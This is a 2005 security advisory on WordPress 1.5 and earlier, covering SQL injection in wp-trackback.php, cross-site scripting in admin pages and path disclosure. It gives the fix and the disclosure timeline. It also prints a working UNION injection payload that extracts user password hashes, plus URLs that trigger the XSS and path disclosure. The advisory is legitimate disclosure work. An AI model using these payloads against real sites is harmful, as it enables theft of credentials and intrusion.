|
Brought to you by:
Suppliers of:
|
|
|
| |
WordPress is "a state-of-the-art semantic personal publishing platform with a focus on aesthetics, web standards, and usability".
Multiple security vulnerabilities have been found in WordPress, the vulnerabilities range from a password revealing SQL injection, through cross site scripting vulnerabilities to path disclosure issues. |
| |
Credit:
The information has been provided by Thomas Waldegger.
|
| |
Vulnerable Systems:
* WordPress version 1.5 and prior
Immune Systems:
* WordPress version 1.5.1 or newer
SQL Injection:
The most critical vulnerability in the 1.5 release of wordpress is an SQL-Injection in `wp-trackback.php'. It's not easily exploitable because you do not get a result when you inject a valid query but it's possible to brute force values in the tables - for example the password hashes.
Here some details:
The parameter `tb_id' in `wp-trackback.php' is not validated correctly and there are no quotes in the SQL-query so an attacker is able to insert SQL commands.
$pingstatus = $wpdb->get_var("SELECT ping_status FROM $wpdb->posts WHERE ID = $tb_id");
Example:
> $tb_id = 1 union select user_pass,0 from wp_users
> $url = bla
> $title = bla
</wp-trackback.php?tb_id=1 union select 0,user_pass from wp_users&url=bla&title=bla>
By injecting this query we get following database error:
> WordPress database error:
> [The used SELECT statements have a different number of columns]
> SELECT ping_status FROM wp_posts WHERE ID = 1 union select 0,
> user_pass from wp_users
When we insert "1 union select user_pass from wp_users" as value for `tb_id' we get no error message because the query was well-formed - logical. Through the possibility to insert any SQL-command it's possible to 'reconstruct' values of the tables.
XSS:
The following two URLs can be used to trigger the cross site scripting vulnerability on the remote host:
http://vulnerable/wp-admin/edit.php?s=[XSS]&submit=Search
http://vulnerable/wp-admin/post.php?action=confirmdeletecomment &comment=1&p=[XSS]
Path Disclosure:
The following three URLs can be used to trigger the path disclosure vulnerability on the remote host:
http://vulnerable/wordpress-1.5-strayhorn/wp-content/themes/*
http://vulnerable/wordpress-1.5-strayhorn/wp-includes/*
http://vulnerable/wordpress-1.5-strayhorn/wp-admin/*
> Fatal error: Call to undefined function add_filter() in
> [...]/htdocs/testenv/blogs/wordpress/wordpress-1.5-strayhorn/
> wp-content/themes/classic/comments-popup.php on line 3
Solution:
Upgrade to WordPress version 1.5.1 or newer.
Disclosure Timeline:
17 Apr 05 - Security flaws discovered
19 Apr 05 - Vendor contacted
10 May 05 - Vendor released bugfixed version
17 May 05 - Public release
|
|
|
|
|
